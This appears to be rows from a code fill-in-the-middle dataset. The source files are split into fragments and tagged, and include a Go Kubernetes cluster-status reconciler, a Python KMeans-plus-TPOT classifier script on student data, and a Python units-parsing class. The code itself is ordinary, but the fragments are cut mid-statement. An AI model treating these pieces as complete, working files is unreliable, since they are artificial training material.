r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient | EnsureCreated | identifier_name |
|
kmeans_to_classifier_main.py | 'first_tkod_tifl_count',
'history_trail_cnt',
'teacher_after_4d_lp_cnt',
'l3m_hw_correct_rate',
# #
'teacher_fresh_hour',
"effectiveCommunicationCount",
"score_min",
'learning_target_lenght',
"teacher_staff_age_byopt",
'self_evaluation_length',
'l3m_avg_has_qz_lc',
'l3m_avg_prop_has_qz_lc',
'l3m_has_qz_lc',
'l3m_prop_has_qz_lc',
labels
]
print(len(df))
# Data preprocessing: clean the raw frame and split it into a training window and a hold-out (btest) window
df_train, df_btest = data_clean(df, min_date="2018-01-01", mid_date="2018-06-15", max_date="2018-06-30", label=labels)
df_train = df_train[select_columns]
df_btest = df_btest[select_columns]
print(len(df_btest))
print(df_train.columns)
print('pos/neg', str(len(df_train[df_train[labels] == 1])) + '/' + str(len(df_train[df_train[labels] == 0])))
t = len(df_train[df_train[labels] == 0]) / len(df_train[df_train[labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t, v)  # negative:positive ratio in the training window and in the hold-out (btest) window
# 特征筛选
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
# Split into training and test sets
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# Separate the label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
# sample_weight
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
# Use K-means to assign cluster categories
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0)  # build the clusterer
estimator.fit(x_train.drop(labels, axis=1))  # run the clustering
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
        # similar in effect to class_weight
"subsample": [0.85], # 取多少样本,放过拟合
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
        'learning_rate': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
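# Illustrative sketch (not from this part of the script): the search space above is
# meant to be handed to TPOT's optimizer, roughly as follows (parameters mirror the
# call used later in the script):
# tpot = TPOTClassifier(generations=10, population_size=150, scoring='f1',
#                       config_dict=tpot_config, n_jobs=-1, verbosity=2)
# tpot.fit(x_train.drop(["chunk_label", labels], axis=1), x_train[labels])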
| random_line_split |
||
kmeans_to_classifier_main.py | [labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# Feature selection
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
# Split into training and test sets
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# Separate the label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
# sample_weight
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
# Use K-means to assign cluster categories
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0)  # build the clusterer
estimator.fit(x_train.drop(labels, axis=1))  # run the clustering
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
        # similar in effect to class_weight
"subsample": [0.85], # 取多少样本,放过拟合
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
        'learning_rate': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
for i in range(5):
tpo = TPOTClassifier(generations=10, verbosity=2, population_size=150,
scoring='f1', n_jobs=-1, config_dict=tpot_config,
mutation_rate | =0.8, crossover_rate=0.2)
x_train_x = np.array(x_train[x_train["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
x_test_x = np.array(x_test[x_test["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
df_btest_x = df_btest[df_btest["chunk_label"] == i].drop("chunk_label",
axis=1)
y_train_x = np.array(x_train[labels])
# clf = tpo.fit(x_train_x, y_train_x)
#
# print(len(df_btest_x))
# print("=========modelu", i, "============")
# evalution_model(clf, df_btest_x.drop("is_sucess_by_contract", axis=1),
# df_btest_x["is_sucess_by_contract"])
#
#
# evalution_model(clf, df_btest.drop("is_sucess_by_contract", axis=1), df_btest["is_sucess_by_contract"])
#
#
# # | conditional_block |
|
units.py | particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
|
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def __mul__(self: _TT, other: float) -> _TT:
"""
Multiply | raise TypeError("Types do not match") | conditional_block |
units.py | particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
if num.count('.') > 1 or len(self._value_prefix) > 1:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
if self._value_prefix not in self._prefix_table:
raise ValueError("Bad prefix for {value}".format(value=value))
self._value = float(num) # type: float
# Preserve the prefix too to preserve precision
self._prefix = self._prefix_table[self._value_prefix] # type: float
@property
def value_prefix(self) -> str:
"""Get the prefix string of this value."""
return self._value_prefix
@property
def value(self) -> float:
"""Get the actual value of this value. (e.g. 10 ns -> 1e-9)"""
return self._value * self._prefix
def value_in_units(self, prefix: str, round_zeroes: bool = True) -> float:
"""Get this value in the given prefix. e.g. "ns", "mV", etc.
"""
# e.g. extract "n" from "ns" or blank if it's blank (e.g. "V" -> "")
letter_prefix = ""
if prefix != self.unit:
letter_prefix = "" if prefix == "" else prefix[0]
retval = self._value * (self._prefix / self._prefix_table[letter_prefix])
if round_zeroes: # pylint: disable=no-else-return
return round(retval, 3)
else:
return retval
def str_value_in_units(self, prefix: str, round_zeroes: bool = True) -> str:
"""Get this value in the given prefix but including the units.
e.g. return "5 ns".
:param prefix: Prefix for the resulting value - e.g. "ns".
:param round_zeroes: True to round 1.00000001 etc to 1 within 3 decimal places.
"""
# %g removes trailing zeroes
return "%g" % (self.value_in_units(prefix, round_zeroes)) + " " + prefix
# Comparison operators.
# Note that mypy doesn't properly support type checking on equality
# operators so the type of __eq__ is object :(
# As a result, the operators' (e.g. __eq__) 'other' type can't be _TT.
# Therefore, we implement the operators themselves separately and then wrap
# them in the special operators.
# See https://github.com/python/mypy/issues/1271
# Disable useless pylint checks for the following methods.
# pylint: disable=unidiomatic-typecheck
def eq(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare equality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value_in_units(self.default_prefix) == other.value_in_units(self.default_prefix)
def __eq__(self: _TT, other: object) -> bool:
"""
Compare equality of this value with another.
The types must match.
"""
return self.eq(other) # type: ignore
def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name
"""
Compare inequality of this value with another.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return not self.eq(other)
def __ne__(self: _TT, other: object) -> bool:
"""
Compare inequality of this value with another.
The types must match.
"""
return self.ne(other) # type: ignore
def __lt__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value < other.value
def __le__(self: _TT, other: _TT) -> bool:
"""
Check if self is less than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value <= other.value
def __gt__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value > other.value
def __ge__(self: _TT, other: _TT) -> bool:
"""
Check if self is greater than or equal to other.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return self.value >= other.value
def __add__(self: _TT, other: _TT) -> _TT:
"""
Add other and self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value + other.value),"")
def __sub__(self: _TT, other: _TT) -> _TT:
"""
Subtract other from self.
The types must match.
"""
if type(self) != type(other):
raise TypeError("Types do not match")
return type(self)(str(self.value - other.value),"")
def __div__(self: _TT, other: float) -> _TT:
"""
Divide self by a float or an integer.
"""
raise NotImplementedError()
# Some python nonsense
def __truediv__(self: _TT, other: float) -> _TT:
return type(self)(str(self.value / other),"")
def | (self: _TT, other: float) -> _TT:
"""
Multiply | __mul__ | identifier_name |
units.py | some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888 | 'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
self._value_prefix = default_prefix
except ValueError:
raise ValueError("Malformed {type} value {value}".format(type=self.unit_type,
value=value))
else:
num = match.group(1)
self._value_prefix = match.group(2)
